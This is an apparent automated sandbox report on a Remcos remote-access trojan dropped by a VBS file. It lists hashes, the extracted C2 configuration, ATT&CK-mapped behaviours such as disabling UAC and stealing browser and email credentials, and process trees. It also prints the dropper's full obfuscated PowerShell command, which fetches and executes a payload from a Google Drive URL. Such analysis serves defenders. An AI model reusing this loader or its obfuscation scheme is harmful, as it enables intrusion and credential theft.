remcos | 9711e0f1f4b1ea97ecf7ddfe05b27c8f712533c2141f6e2b064d636076e76652

Analysis

max time kernel
149s
max time network
147s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20241023-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system
submitted
06-11-2024 02:10

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

EE85716273pdf.vbs
Size

15KB
MD5

dd2dbf4aaf7ccc943b82dda51afc985e
SHA1

61a75176fefa4be72f5978319116722396a0e919
SHA256

f592c9039e109241cbfd30ae6b0ec2c1098b10ca1dfa80eb427edea6564265f5
SHA512

bcaaeeb59703067a86e59d94323f20347ca047c54658baf2dd4f50101a089b63407de4654138ed6dcf46a664cac0f5724322d9db86e4167d1e61b09db4a97f32
SSDEEP

384:9b7o6mutReVkQRfjj+3auNjYKv5QN+pBcXg:ds6muSfe3auhYKuMpB7

Score

10^/10

remcos remotehost collection credential_access discovery evasion rat stealer trojan

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

ris4sts8yan0i.duckdns.org:23458

Attributes

audio_folder
MicRecords
audio_path
ApplicationPath
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
true
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-LAZAF7
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Remcos family
remcos
UAC bypass 3 TTPs 1 IoCs
evasion trojan

Bypass User Account Control
T1548.002

Disable or Modify Tools
T1562.001

Modify Registry
T1112

Processes:

reg.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Detected Nirsoft tools 3 IoCs

Free utilities often used by attackers which can steal passwords, product keys, etc.

Processes:

resource	yara_rule
behavioral6/memory/4656-141-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft
behavioral6/memory/1120-163-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft
behavioral6/memory/4944-176-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft

NirSoft MailPassView 1 IoCs

Password recovery tool for various email clients

Processes:

resource	yara_rule
behavioral6/memory/4944-176-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView

NirSoft WebBrowserPassView 1 IoCs

Password recovery tool for various web browsers

Processes:

resource	yara_rule
behavioral6/memory/4656-141-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView

Blocklisted process makes network request 13 IoCs

Processes:

WScript.exepowershell.exemsiexec.exe

flow	pid	process
5	1048	WScript.exe
8	3036	powershell.exe
10	3036	powershell.exe
44	4800	msiexec.exe
47	4800	msiexec.exe
49	4800	msiexec.exe
54	4800	msiexec.exe
55	4800	msiexec.exe
58	4800	msiexec.exe
59	4800	msiexec.exe
60	4800	msiexec.exe
61	4800	msiexec.exe
63	4800	msiexec.exe

Uses browser remote debugging 2 TTPs 9 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
credential_access stealer

Steal Web Session Cookie
T1539

Modify Authentication Process
T1556

Processes:

Chrome.exeChrome.exemsedge.exemsedge.exemsedge.exeChrome.exeChrome.exemsedge.exemsedge.exe

pid process

952 Chrome.exe
2004 Chrome.exe
472 msedge.exe
5048 msedge.exe
3176 msedge.exe
4956 Chrome.exe
3096 Chrome.exe
984 msedge.exe
4208 msedge.exe
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

WScript.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation WScript.exe

pid	process
952	Chrome.exe
2004	Chrome.exe
472	msedge.exe
5048	msedge.exe
3176	msedge.exe
4956	Chrome.exe
3096	Chrome.exe
984	msedge.exe
4208	msedge.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation	WScript.exe

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

Processes:

msiexec.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	msiexec.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service
T1102

Processes:

flow ioc

7 drive.google.com
8 drive.google.com
44 drive.google.com
Network Service Discovery 1 TTPs 2 IoCs
Attempt to gather information on host's network.
discovery

Network Service Discovery
T1046

Processes:

powershell.exepowershell.exe

pid process

1484 powershell.exe
3036 powershell.exe
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

Processes:

msiexec.exe

pid process

4800 msiexec.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

powershell.exemsiexec.exe

pid process

1484 powershell.exe
4800 msiexec.exe

flow	ioc
7	drive.google.com
8	drive.google.com
44	drive.google.com

pid	process
1484	powershell.exe
3036	powershell.exe

pid	process
4800	msiexec.exe

pid	process
1484	powershell.exe
4800	msiexec.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

msiexec.exe

description	pid	process	target process
PID 4800 set thread context of 4656	4800	msiexec.exe	msiexec.exe
PID 4800 set thread context of 4944	4800	msiexec.exe	msiexec.exe
PID 4800 set thread context of 1120	4800	msiexec.exe	msiexec.exe

Drops file in Windows directory 1 IoCs

Processes:

Chrome.exe

description ioc process

File opened for modification C:\Windows\SystemTemp Chrome.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

description	ioc	process
File opened for modification	C:\Windows\SystemTemp	Chrome.exe

System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

msiexec.exemsiexec.exemsiexec.exepowershell.exemsiexec.execmd.exereg.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

Chrome.exemsedge.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	Chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

4584 reg.exe

pid	process
4584	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exemsiexec.exeChrome.exemsiexec.exemsiexec.exe

pid	process
3036	powershell.exe
3036	powershell.exe
1484	powershell.exe
1484	powershell.exe
1484	powershell.exe
4800	msiexec.exe
4800	msiexec.exe
4800	msiexec.exe
4800	msiexec.exe
4800	msiexec.exe
4800	msiexec.exe
4800	msiexec.exe
4800	msiexec.exe
4800	msiexec.exe
4800	msiexec.exe
4800	msiexec.exe
4800	msiexec.exe
4800	msiexec.exe
4800	msiexec.exe
4800	msiexec.exe
4800	msiexec.exe
4800	msiexec.exe
4800	msiexec.exe
4800	msiexec.exe
4800	msiexec.exe
4800	msiexec.exe
4800	msiexec.exe
4800	msiexec.exe
4800	msiexec.exe
4800	msiexec.exe
4800	msiexec.exe
4800	msiexec.exe
4800	msiexec.exe
4956	Chrome.exe
4956	Chrome.exe
4656	msiexec.exe
4656	msiexec.exe
4800	msiexec.exe
4800	msiexec.exe
4800	msiexec.exe
4800	msiexec.exe
1120	msiexec.exe
1120	msiexec.exe
4800	msiexec.exe
4800	msiexec.exe
4800	msiexec.exe
4800	msiexec.exe
4800	msiexec.exe
4800	msiexec.exe
4800	msiexec.exe
4800	msiexec.exe
4800	msiexec.exe
4800	msiexec.exe
4800	msiexec.exe
4800	msiexec.exe
4800	msiexec.exe
4800	msiexec.exe
4800	msiexec.exe
4800	msiexec.exe
4800	msiexec.exe
4800	msiexec.exe
4800	msiexec.exe
4800	msiexec.exe
4656	msiexec.exe

Suspicious behavior: MapViewOfSection 4 IoCs

Processes:

powershell.exemsiexec.exe

pid process

1484 powershell.exe
4800 msiexec.exe
4800 msiexec.exe
4800 msiexec.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs

Processes:

msedge.exe

pid process

984 msedge.exe
984 msedge.exe
984 msedge.exe
984 msedge.exe

pid	process
1484	powershell.exe
4800	msiexec.exe
4800	msiexec.exe
4800	msiexec.exe

pid	process
984	msedge.exe
984	msedge.exe
984	msedge.exe
984	msedge.exe

Suspicious use of AdjustPrivilegeToken 19 IoCs

Processes:

powershell.exepowershell.exemsiexec.exeChrome.exe

description	pid	process
Token: SeDebugPrivilege	3036	powershell.exe
Token: SeDebugPrivilege	1484	powershell.exe
Token: SeDebugPrivilege	1120	msiexec.exe
Token: SeShutdownPrivilege	4956	Chrome.exe
Token: SeCreatePagefilePrivilege	4956	Chrome.exe
Token: SeShutdownPrivilege	4956	Chrome.exe
Token: SeCreatePagefilePrivilege	4956	Chrome.exe
Token: SeShutdownPrivilege	4956	Chrome.exe
Token: SeCreatePagefilePrivilege	4956	Chrome.exe
Token: SeShutdownPrivilege	4956	Chrome.exe
Token: SeCreatePagefilePrivilege	4956	Chrome.exe
Token: SeShutdownPrivilege	4956	Chrome.exe
Token: SeCreatePagefilePrivilege	4956	Chrome.exe
Token: SeShutdownPrivilege	4956	Chrome.exe
Token: SeCreatePagefilePrivilege	4956	Chrome.exe
Token: SeShutdownPrivilege	4956	Chrome.exe
Token: SeCreatePagefilePrivilege	4956	Chrome.exe
Token: SeShutdownPrivilege	4956	Chrome.exe
Token: SeCreatePagefilePrivilege	4956	Chrome.exe

Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

Chrome.exemsedge.exe

pid process

4956 Chrome.exe
984 msedge.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

msiexec.exe

pid process

4800 msiexec.exe

pid	process
4956	Chrome.exe
984	msedge.exe

pid	process
4800	msiexec.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

WScript.exepowershell.exemsiexec.execmd.exeChrome.exe

description	pid	process	target process
PID 1048 wrote to memory of 3036	1048	WScript.exe	powershell.exe
PID 1048 wrote to memory of 3036	1048	WScript.exe	powershell.exe
PID 1484 wrote to memory of 4800	1484	powershell.exe	msiexec.exe
PID 1484 wrote to memory of 4800	1484	powershell.exe	msiexec.exe
PID 1484 wrote to memory of 4800	1484	powershell.exe	msiexec.exe
PID 1484 wrote to memory of 4800	1484	powershell.exe	msiexec.exe
PID 4800 wrote to memory of 272	4800	msiexec.exe	cmd.exe
PID 4800 wrote to memory of 272	4800	msiexec.exe	cmd.exe
PID 4800 wrote to memory of 272	4800	msiexec.exe	cmd.exe
PID 272 wrote to memory of 4584	272	cmd.exe	reg.exe
PID 272 wrote to memory of 4584	272	cmd.exe	reg.exe
PID 272 wrote to memory of 4584	272	cmd.exe	reg.exe
PID 4800 wrote to memory of 4956	4800	msiexec.exe	Chrome.exe
PID 4800 wrote to memory of 4956	4800	msiexec.exe	Chrome.exe
PID 4956 wrote to memory of 2064	4956	Chrome.exe	Chrome.exe
PID 4956 wrote to memory of 2064	4956	Chrome.exe	Chrome.exe
PID 4956 wrote to memory of 3300	4956	Chrome.exe	Chrome.exe
PID 4956 wrote to memory of 3300	4956	Chrome.exe	Chrome.exe
PID 4956 wrote to memory of 3300	4956	Chrome.exe	Chrome.exe
PID 4956 wrote to memory of 3300	4956	Chrome.exe	Chrome.exe
PID 4956 wrote to memory of 3300	4956	Chrome.exe	Chrome.exe
PID 4956 wrote to memory of 3300	4956	Chrome.exe	Chrome.exe
PID 4956 wrote to memory of 3300	4956	Chrome.exe	Chrome.exe
PID 4956 wrote to memory of 3300	4956	Chrome.exe	Chrome.exe
PID 4956 wrote to memory of 3300	4956	Chrome.exe	Chrome.exe
PID 4956 wrote to memory of 3300	4956	Chrome.exe	Chrome.exe
PID 4956 wrote to memory of 3300	4956	Chrome.exe	Chrome.exe
PID 4956 wrote to memory of 3300	4956	Chrome.exe	Chrome.exe
PID 4956 wrote to memory of 3300	4956	Chrome.exe	Chrome.exe
PID 4956 wrote to memory of 3300	4956	Chrome.exe	Chrome.exe
PID 4956 wrote to memory of 3300	4956	Chrome.exe	Chrome.exe
PID 4956 wrote to memory of 3300	4956	Chrome.exe	Chrome.exe
PID 4956 wrote to memory of 3300	4956	Chrome.exe	Chrome.exe
PID 4956 wrote to memory of 3300	4956	Chrome.exe	Chrome.exe
PID 4956 wrote to memory of 3300	4956	Chrome.exe	Chrome.exe
PID 4956 wrote to memory of 3300	4956	Chrome.exe	Chrome.exe
PID 4956 wrote to memory of 3300	4956	Chrome.exe	Chrome.exe
PID 4956 wrote to memory of 3300	4956	Chrome.exe	Chrome.exe
PID 4956 wrote to memory of 3300	4956	Chrome.exe	Chrome.exe
PID 4956 wrote to memory of 3300	4956	Chrome.exe	Chrome.exe
PID 4956 wrote to memory of 3300	4956	Chrome.exe	Chrome.exe
PID 4956 wrote to memory of 3300	4956	Chrome.exe	Chrome.exe
PID 4956 wrote to memory of 3300	4956	Chrome.exe	Chrome.exe
PID 4956 wrote to memory of 3300	4956	Chrome.exe	Chrome.exe
PID 4956 wrote to memory of 3300	4956	Chrome.exe	Chrome.exe
PID 4956 wrote to memory of 3300	4956	Chrome.exe	Chrome.exe
PID 4956 wrote to memory of 3724	4956	Chrome.exe	Chrome.exe
PID 4956 wrote to memory of 3724	4956	Chrome.exe	Chrome.exe
PID 4956 wrote to memory of 3420	4956	Chrome.exe	Chrome.exe
PID 4956 wrote to memory of 3420	4956	Chrome.exe	Chrome.exe
PID 4956 wrote to memory of 3420	4956	Chrome.exe	Chrome.exe
PID 4956 wrote to memory of 3420	4956	Chrome.exe	Chrome.exe
PID 4956 wrote to memory of 3420	4956	Chrome.exe	Chrome.exe
PID 4956 wrote to memory of 3420	4956	Chrome.exe	Chrome.exe
PID 4956 wrote to memory of 3420	4956	Chrome.exe	Chrome.exe
PID 4956 wrote to memory of 3420	4956	Chrome.exe	Chrome.exe
PID 4956 wrote to memory of 3420	4956	Chrome.exe	Chrome.exe
PID 4956 wrote to memory of 3420	4956	Chrome.exe	Chrome.exe
PID 4956 wrote to memory of 3420	4956	Chrome.exe	Chrome.exe
PID 4956 wrote to memory of 3420	4956	Chrome.exe	Chrome.exe
PID 4956 wrote to memory of 3420	4956	Chrome.exe	Chrome.exe
PID 4956 wrote to memory of 3420	4956	Chrome.exe	Chrome.exe
PID 4956 wrote to memory of 3420	4956	Chrome.exe	Chrome.exe
PID 4956 wrote to memory of 3420	4956	Chrome.exe	Chrome.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\EE85716273pdf.vbs"
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1048
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Hjremarginerne Pastelfarvens Electroscission Luksusgenstande #>;$problemers='Kongebonde';<#Prowled Svovlsurt Regionsplanretningsliniens Oprindeligt tankskib Pantstterens Schleichera #>; function Umaadeholdenhed($Targes){If ($host.DebuggerEnabled) {$Animatist++;}$Decimerende=$Promonarchists+$Targes.'Length' - $Animatist; for ( $Ordinres=4;$Ordinres -lt $Decimerende;$Ordinres+=5){$rallyes=$Ordinres;$Notationsformernes+=$Targes[$Ordinres];}$Notationsformernes;}function Disrespecter($Savouriest){ & ($Overassertion) ($Savouriest);}$Godmaking=Umaadeholdenhed ' Fi,MsvmmoEphazUnsei mkalAnthlS,mfaTvil/Jimm ';$Nadia=Umaadeholdenhed 'K geTAfsmlIsodsIndf1Fuld2Vest ';$Nerver='Ini [H ran.akte J cT Je,.Wep.sOmgre IndRMemoVBullIAnneC ValESlynpPaafoSejlIprotnSocit ForM ennaIllenFwoma ,evgRe.neHarmRcont]Bak : dbe: linSRoboE UndCOut UKalkrSu iIA.trTamm y arPCounr HenOrrflT ndro,okicFyldOMe llDefi=Pala$StudN UniaSnftDDekuI linAGyne ';$Godmaking+=Umaadeholdenhed 'Vvre5 Tr . Mor0Incl Ador(ExpoW Fari in nSkatd.nfao erswFo ls ol NonnNFiskTFrem A.sa1 pr0Skr . Bat0 L b;Samm EnteWKal,i drunDe i6 For4 ot;Tilh AuguxBage6Pead4Unde;to v Manlr KodvTrav:Brit1wate3Mod,1 kam.Gav,0Disp)Cha ,isiGVelfe Re,c HerkFredoTiko/Indd2Rand0.ubt1Arca0 Sm,0Teks1 Sel0Indu1Udta harpFUdkriPendr vere UnffKlaro angxh ez/Sole1Luft3T.av1,rem.Bys.0Immo ';$Sabotagen=Umaadeholdenhed 'KalkUIndhShru,E EthrPres-indiaCa og SufEPensNPaeat For ';$Gefulltefish=Umaadeholdenhed ' kruh BestKlodt Comp ives Fo.:Dile/Hjem/Aandd ,enrWhisiBr,nv Flse Bus.Cromg.iasoKo soStetg orslIncleMart. ollc Sv o.ubtmF.jl/EfteuAs.ecObse?.augeCounxPolypEbonoS lfrk ngtAkku=UrosdspisoAbasw SkanIn.alGru oNedsaSknkd art&AzotiBlepdBjer=Divi1,rmi9Brani.lleuharc6Ca p4 Evom rev- Kiwn AerlMordz Che4NyerZK,nskOuts_BizaAUnt,kUndeo AmpVGrunG UndwUnre_ResecWardzAdjoESiegW FluuTouc6Unprs W,i1Ledewmongx nti4 Agr ';$Tripl=Umaadeholdenhed 'Se.i>Best ';$Overassertion=Umaadeholdenhed 'UndeiunmaEAn hx Qua ';$Regnearter='Celebriteternes119';$dryptrringens='\Trosbekendelsers.Kas';Disrespecter (Umaadeholdenhed ' Fls$KartG adrlNonro R,dBTrava sp LR as: eorqCustuTolda vanKLgelENonaRScroi DisCTest=G.de$OphvESwi NAfmiVAdve:LaanaSpndPSta PBlacDIde aAnakt No aUndd+ S n$ DioDFkalR fjeY tfPOs eTBlearR.grRRigsIFredNLommg anseKoncNUnv sTykt ');Disrespecter (Umaadeholdenhed ' min$P,lmGPhytLKildoHeksB dipASprelSa d:InfiTHoloU SynRBrasTLo.eLGnu ECondD Rox=be a$ CoegSabeE JuvFStvnU KrllK.rklmatrTSt.lEImitf no,iSkobSReseHLem..Gaagshy ePAlliLEntrICophTC mm( en$ScotTTragr Da iF ltP,skrlOpa )Nont ');Disrespecter (Umaadeholdenhed $Nerver);$Gefulltefish=$turtled[0];$Spisevogns=(Umaadeholdenhed ' Tok$StregInteLRashOParobbindaPapilrewa:For,hShesIAnguSMo,otCeyloBogcnSoubE qui=.pryN olieMatrWSpro-K,pko TribDetejDataEUnsuC tatDhun FysiSNov YMadasKaoltGaouEB,llM .in.Pik.NNonpeCarrTTaar.JgerWNykueQuodbLigecWashL dsaiTautEUnl n andtDi.s ');Disrespecter ($Spisevogns);Disrespecter (Umaadeholdenhed 'Lumi$sci hForaiBa os ProtGsteoUnivn traeNon .AggrH amseStbeaAci dM dkeBugtrSubds bre[Unpe$U sySi daaJvnfbGlyco UdktLieba .ergSkumebar npama]Flyd= U.i$ErgoGTan oBilldAmorm laaMi ikChoniTi bn nngHale ');$Incomprehended=Umaadeholdenhed 'Serp$ ernhBehaiNonds Re tUndeoSlovnForhe Str.CrisD MagoClonwB,rwnRusll KviostejaNatudPulsFFo miVacalMarceCowo(A to$W,doG SveetilsfHenvu inhlundelForttK aleKredf CroiXenosOc eh Dis,B,er$ ineRTndeeSkmteSa,nn B ulSkraiP.alsAlfat K.uiAfhjn antgStvr) ,ic ';$Reenlisting=$quakeric;Disrespecter (Umaadeholdenhed ' Squ$FrucG KyslUn.eOHundBNonaAForkLUnte:Photqb.inUJoinEInteM UdlAgranDSm doFors=Alve(ElekTEctreUrimsPar t f r-Ko tpOrdraOb iT Fa Hr of Prim$HoejRLe iEMedde S.iNBlokLOffeIDidoSPrfaTHymnIMaanNMajeGObdu)Suba ');while (!$quemado) {Disrespecter (Umaadeholdenhed 'Slut$Hemog,esmlMello MurbSlagaR ddlSter:SupeFTri,nOveruTwopgdebufTol,r Ocei Oute.men= Fje$PeritSmrrrHkleuConteEmpi ') ;Disrespecter $Incomprehended;Disrespecter (Umaadeholdenhed 'Svans TkkTvidea CloR ndutStil-KlipsCop lInosE emoeMongPPseu Refo4Spnd ');Disrespecter (Umaadeholdenhed 'Amph$EpheGPalml U voGennBDynaAOv.rl Sej: recqTestUBelrEt faMRingA Aphd oplOPoli= Unc(LightOff ERe eSDi itMona-AkkopAnimaNonfTTirrH Kin Al e$Nic.rMi rerovfeSigtnM jklanglIC ntSSkaftopreIOccunOr gGLino)Sig. ') ;Disrespecter (Umaadeholdenhed 'Soja$Tu ig,andLP edo MamBHockADatalFavn:OpfiRsyntES ifLG.rmaTa,kXOd eAKnstnMer t Ter=Kach$ asiG leuLUd aOUn ebMi,lAPreaLBai.:UnreP ExqrPolieT.irc,lloIRu.dRfalscSmaguSpecl EpiAA,chTKva eB.eg+ red+Resp%Cont$BalsTDis,U GodrF nat Intl co,E Oz DFre . Pi,C ompO etcUMininFestT,ksa ') ;$Gefulltefish=$turtled[$Relaxant];}$Fensmark=316424;$Raptusernes158=29872;Disrespecter (Umaadeholdenhed ' vru$ ShogStryLUrproSeclBZ.omaWileLFr a: Ca,nIgnaOUnfiNAppliPlanNFallT oneSammrBes,p UnhRKostEChamTBlomaEmbabCirkI.ampLInviiPladtSp lY Deb Samm=.col SquaG antEForfTC ga- LufcShoao TetnHjreTRegnENephnDacaTSwin Napo$Un xrpianEBli,EfilinHis L ideiCrumsTilbTbedyIHr sNBal,gDisk ');Disrespecter (Umaadeholdenhed ' Afh$MansgAtrolKar,oCostbSc ea ManlH er:Str OOxeapReprbA faeOutcvAnc aPacerTrkaiPennn blugGenesRat,sGreetta,meMal dSuggsFogg Non= Sel Vels[ FlaSTomoyVitrs raft nsieChurmDi.t.Ort CS uio podn angvJeaneAvler B.dt lec]Titi:Akts:In,pF emirRundoMagim ,duB Ud.aForms CoueUldt6Ecch4 UndSshiktAdulr FotiOutbnCancgCaro(Komm$ simN EksoRecanGenbiRygen.kvhtFil,eRrfrr SejpI dfrSpireTilktNotaaCornbKom,iPurilCykeiVorttBaigymedi)i.dt ');Disrespecter (Umaadeholdenhed ' nst$ tregPrinlBloko FinbCameAHandlPa k:TweeL De E GylvSupreTrykVDa te,andJAntie EufSBes. Tryk=D.fe eta[,avisS raYFal SUnabTMo oeOplomStro. RadTForsE Pl xB,lltduod.Imp eBanjnMus CInteo gladSteeIEtf.N .orGkr s]Ulff: Roc:RenvAAfspsfermC SkoiTilii C y.DestGBifoeChootSn.ts HeltGermRCithIGubeNNedsgAjax( Bde$MilloFletPFre,bAccoe,ltfvO dtAIn.er Su,I FarnGramg nomSGivesm,vetHe aeBed DLoneSF,em) emi ');Disrespecter (Umaadeholdenhed 'Ikeb$Lej GRgerlAtmooNonmbAmarAJensL Inv:Hamil R,tAOverSAkkoESociR SkoPBundRDaydiVestnspecT UnseSpalROutsDtalvEPr afTherI TogNOv rI regTSuprI BinOWoodnc rds U l=Rigs$ NatL OutEM trvBurle P cVGurnET anJ GolENormSsubj.R ngSDiplUVensb,olsSWildt coorRegiIHollNU,trg Dr (Evac$SenefFonteGoveN D ms chrmXystaSta r LevK imm, Kom$A,toRRecoaEi,ePTetrt onsu oorsBro EBaanr DagnSkolE BorsDobb1Sand5Ypp 8Damp)Unde ');Disrespecter $Laserprinterdefinitions;"
  2⤵
  - Blocklisted process makes network request
  - Network Service Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3036

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Hjremarginerne Pastelfarvens Electroscission Luksusgenstande #>;$problemers='Kongebonde';<#Prowled Svovlsurt Regionsplanretningsliniens Oprindeligt tankskib Pantstterens Schleichera #>; function Umaadeholdenhed($Targes){If ($host.DebuggerEnabled) {$Animatist++;}$Decimerende=$Promonarchists+$Targes.'Length' - $Animatist; for ( $Ordinres=4;$Ordinres -lt $Decimerende;$Ordinres+=5){$rallyes=$Ordinres;$Notationsformernes+=$Targes[$Ordinres];}$Notationsformernes;}function Disrespecter($Savouriest){ & ($Overassertion) ($Savouriest);}$Godmaking=Umaadeholdenhed ' Fi,MsvmmoEphazUnsei mkalAnthlS,mfaTvil/Jimm ';$Nadia=Umaadeholdenhed 'K geTAfsmlIsodsIndf1Fuld2Vest ';$Nerver='Ini [H ran.akte J cT Je,.Wep.sOmgre IndRMemoVBullIAnneC ValESlynpPaafoSejlIprotnSocit ForM ennaIllenFwoma ,evgRe.neHarmRcont]Bak : dbe: linSRoboE UndCOut UKalkrSu iIA.trTamm y arPCounr HenOrrflT ndro,okicFyldOMe llDefi=Pala$StudN UniaSnftDDekuI linAGyne ';$Godmaking+=Umaadeholdenhed 'Vvre5 Tr . Mor0Incl Ador(ExpoW Fari in nSkatd.nfao erswFo ls ol NonnNFiskTFrem A.sa1 pr0Skr . Bat0 L b;Samm EnteWKal,i drunDe i6 For4 ot;Tilh AuguxBage6Pead4Unde;to v Manlr KodvTrav:Brit1wate3Mod,1 kam.Gav,0Disp)Cha ,isiGVelfe Re,c HerkFredoTiko/Indd2Rand0.ubt1Arca0 Sm,0Teks1 Sel0Indu1Udta harpFUdkriPendr vere UnffKlaro angxh ez/Sole1Luft3T.av1,rem.Bys.0Immo ';$Sabotagen=Umaadeholdenhed 'KalkUIndhShru,E EthrPres-indiaCa og SufEPensNPaeat For ';$Gefulltefish=Umaadeholdenhed ' kruh BestKlodt Comp ives Fo.:Dile/Hjem/Aandd ,enrWhisiBr,nv Flse Bus.Cromg.iasoKo soStetg orslIncleMart. ollc Sv o.ubtmF.jl/EfteuAs.ecObse?.augeCounxPolypEbonoS lfrk ngtAkku=UrosdspisoAbasw SkanIn.alGru oNedsaSknkd art&AzotiBlepdBjer=Divi1,rmi9Brani.lleuharc6Ca p4 Evom rev- Kiwn AerlMordz Che4NyerZK,nskOuts_BizaAUnt,kUndeo AmpVGrunG UndwUnre_ResecWardzAdjoESiegW FluuTouc6Unprs W,i1Ledewmongx nti4 Agr ';$Tripl=Umaadeholdenhed 'Se.i>Best ';$Overassertion=Umaadeholdenhed 'UndeiunmaEAn hx Qua ';$Regnearter='Celebriteternes119';$dryptrringens='\Trosbekendelsers.Kas';Disrespecter (Umaadeholdenhed ' Fls$KartG adrlNonro R,dBTrava sp LR as: eorqCustuTolda vanKLgelENonaRScroi DisCTest=G.de$OphvESwi NAfmiVAdve:LaanaSpndPSta PBlacDIde aAnakt No aUndd+ S n$ DioDFkalR fjeY tfPOs eTBlearR.grRRigsIFredNLommg anseKoncNUnv sTykt ');Disrespecter (Umaadeholdenhed ' min$P,lmGPhytLKildoHeksB dipASprelSa d:InfiTHoloU SynRBrasTLo.eLGnu ECondD Rox=be a$ CoegSabeE JuvFStvnU KrllK.rklmatrTSt.lEImitf no,iSkobSReseHLem..Gaagshy ePAlliLEntrICophTC mm( en$ScotTTragr Da iF ltP,skrlOpa )Nont ');Disrespecter (Umaadeholdenhed $Nerver);$Gefulltefish=$turtled[0];$Spisevogns=(Umaadeholdenhed ' Tok$StregInteLRashOParobbindaPapilrewa:For,hShesIAnguSMo,otCeyloBogcnSoubE qui=.pryN olieMatrWSpro-K,pko TribDetejDataEUnsuC tatDhun FysiSNov YMadasKaoltGaouEB,llM .in.Pik.NNonpeCarrTTaar.JgerWNykueQuodbLigecWashL dsaiTautEUnl n andtDi.s ');Disrespecter ($Spisevogns);Disrespecter (Umaadeholdenhed 'Lumi$sci hForaiBa os ProtGsteoUnivn traeNon .AggrH amseStbeaAci dM dkeBugtrSubds bre[Unpe$U sySi daaJvnfbGlyco UdktLieba .ergSkumebar npama]Flyd= U.i$ErgoGTan oBilldAmorm laaMi ikChoniTi bn nngHale ');$Incomprehended=Umaadeholdenhed 'Serp$ ernhBehaiNonds Re tUndeoSlovnForhe Str.CrisD 